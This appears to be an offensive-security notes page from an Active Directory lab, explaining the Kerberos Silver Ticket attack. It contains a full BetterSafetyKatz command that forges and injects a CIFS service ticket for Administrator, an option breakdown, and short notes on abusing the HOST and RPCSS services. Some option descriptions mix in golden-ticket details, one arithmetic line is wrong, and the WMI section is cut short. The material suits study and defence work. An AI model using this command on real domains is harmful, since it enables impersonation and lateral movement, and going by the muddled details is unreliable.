search

Silver Ticket

Silver ticket is signed and encrypted by the hash of service account which makes it a valid TGS ticket.

hashtag
Create The Ticket

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden 
/User:Administrator /domain:dollarcorp.moneycorp.local
/sid:S-1-5-21-719815819-3726368948-3917688648 
/target:dcorp-dc.dollarcorp.moneycorp.local
/service:CIFS /rc4:e9bb4c3d1327e29093dfecab8c2676f6 
/startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
Options

kerberos::golden

Name of the module

/User:Administrator

Username for which the TGT is generated

/domain:

Domain FQDN

/sid:

SID of the domain

/target:

Target server FQDN

/service:

The SPN name of service for which TGS is to be created

/aes256:

AES256 keys of the krbtgt account

/id:500 /groups:512

Optional User and Group RID

/ptt

ptt: inject ticket to current process

/startoffset:0

Optional when the ticket is available in minutes. Use negative for a ticket available from past and a larger number for future.

/endin:600

Optional ticket lifetime in minutes. (default 10 years) The default AD setting is 10 hours = 600 minutes

/renewmax:10080

Optional ticket lifetime with renewal in minutes. (default is 10 years) The default AD setting is 7 days = 100800

hashtag
Abusing Services

hashtag
HOST

HOST Service permission allows to create scheduled tasks in remote computers The Silver ticket needs to be created with the NT Hash of the target machine

hashtag
HOST + RPCSS

With these tickets you can execute WMI in the victim system:

Last updated